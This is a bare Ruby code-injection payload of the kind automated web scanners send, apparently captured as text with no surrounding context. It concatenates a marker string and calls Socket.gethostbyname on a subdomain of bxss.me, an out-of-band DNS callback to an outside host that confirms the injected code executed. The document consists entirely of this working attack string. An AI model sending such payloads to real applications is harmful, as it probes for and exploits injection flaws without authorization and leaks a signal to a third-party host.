“+”A”.concat(70-3).concat(22*4).concat(111).concat(86).concat(120).concat(89)+(require”socket”
Socket.gethostbyname(“hitvp”+”nehyuqev53b57.bxss.me.”)[3].to_s)+”